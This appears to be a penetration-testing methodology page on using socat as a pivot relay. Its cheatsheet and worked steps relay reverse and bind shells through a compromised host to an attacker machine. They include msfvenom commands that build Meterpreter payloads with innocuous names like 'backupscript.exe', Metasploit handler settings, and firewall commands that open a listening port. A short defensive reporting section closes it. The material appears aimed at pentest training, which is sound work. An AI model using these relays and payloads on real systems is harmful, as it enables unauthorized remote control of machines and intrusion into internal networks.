π‘οΈ Methodology Checklist
- Confirm socat is available on pivot (or upload static binary)
- TCP relay:
socat TCP-LISTEN:[PORT],fork TCP:[DEST_IP]:[DEST_PORT] - Verify relay listening:
ss -tlnp | grep [PORT] - Connect from attacker directly to pivot:[PORT] as if it were dest
- UDP relay: replace
TCPwithUDPin socat syntax - Background socat with
&if needed - Kill socat relay on pivot when finished
π― Operational Context
Use when: Simple one-hop TCP relay needed on Linux pivot β socat creates bidirectional relay between ports without installing anything complex.
Think Dumber First: socat TCP-LISTEN:[PORT],fork TCP:[INTERNAL_IP]:[INTERNAL_PORT] β single command relay on the pivot. Attack box connects to [PIVOT]:[PORT] and gets forwarded to the internal target transparently.
Skip when: Multi-hop pivoting needed β socat handles single hops; chain with SSH or Chisel for multi-hop.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[LHOST]:[LPORT] | Reverse shell relay β forward incoming connections to attack host |
socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[INTERNAL_IP]:[TARGET_PORT] | Bind shell relay β bridge attack host to internal bind shell |
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=[PIVOT_LAN_IP] LPORT=[PIVOT_PORT] -f exe -o shell.exe | Generate payload pointing to pivot (not attack host) |
π¬ Deep Dive & Workflow
When to Use Socat
Use socat when SSH is unavailable/blocked on the pivot host. It works as a standalone relay binary requiring no SSH keys or credentials β just a shell on the pivot.
Traffic flow (reverse shell):
[Windows Target] β connects to Pivot:8080 β [Socat relay] β forwards to Attacker:80 β [Metasploit]
Traffic flow (bind shell):
[Attacker] β connects to Pivot:8080 β [Socat relay] β forwards to Target:8443 β [Bind shell]
Reverse Shell Relay
# 1. Start socat relay on pivot host
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
# fork = critical: without it, socat dies after first connection attempt
# 2. Generate payload on attack host
# LHOST = PIVOT's internal IP (what target can reach)
# LPORT = port socat is listening on
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 LPORT=8080 -f exe -o backupscript.exe
# 3. Catch on attack host
# LPORT = what socat forwards TO (port 80, not 8080)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0; set lport 80; run
# 4. Transfer and execute payload on targetPort alignment critical:
- Payload β pivot port (8080) β what target connects to
- Socat β attack port (80) β where socat sends it
- Handler β attack port (80) β must match socatβs destination
Bind Shell Relay
# 1. Generate bind payload for target
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupjob.exe LPORT=8443
# 2. Execute on target (it waits for connections on 8443)
# 3. Start socat relay on pivot
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
# 4. Configure handler on attack host
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64 # pivot IP (you connect to pivot, not target)
set LPORT 8080 # pivot's socat port
runCritical Notes
| Component | Setting | Why |
|---|---|---|
fork option | Always include | Without it socat terminates after one connection attempt |
| Payload LHOST | Pivot LAN IP | Target cannot route to attack host VPN IP |
| Listener LPORT | Must match socat destination | Mismatched port = silent failure |
| Handler RHOST | Pivot IP (bind shell) | You connect to pivot, which forwards to target |
Firewall: Socatβs listen port must be reachable on the pivot. If iptables blocks it, open with iptables -I INPUT -p tcp --dport 8080 -j ACCEPT (requires root on pivot). High ports (>1024) avoid the privilege requirement.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| socat not found | Not installed | Install: apt install socat; or transfer static binary: socat static builds available for most architectures |
| socat relay drops after first connection | Missing fork | Add fork option: socat TCP-LISTEN:[PORT],fork TCP:[DEST]:[PORT]; without fork, only one connection served |
| socat SSL relay cert errors | Self-signed cert | Generate: openssl req -newkey rsa:2048 -nodes -keyout server.key -x509 -days 1 -out server.crt && cat server.key server.crt > server.pem |
| UDP relay not working | TCP-specific command | For UDP: socat UDP-LISTEN:[PORT],fork UDP:[DEST]:[PORT] |
| socat process consuming high CPU | Many connections or large data | Reduce concurrent connections; socat is single-threaded per process; run multiple instances |
π Reporting Trigger
Finding Title: socat TCP Relay Extends Attack Reach to Internal Network Services Impact: socat relay on a compromised pivot host provides transparent TCP forwarding to internal services, enabling direct connection to internal RDP, SSH, databases, and admin interfaces from an external attacker position. Root Cause: No monitoring for socat relay processes or unusual listening ports on compromised hosts. Internal services reachable from the compromised host without segmentation. Recommendation: Implement process monitoring to detect socat execution on production hosts. Alert on unexpected listening TCP ports. Enforce network ACLs preventing internal services from being accessed from non-management hosts.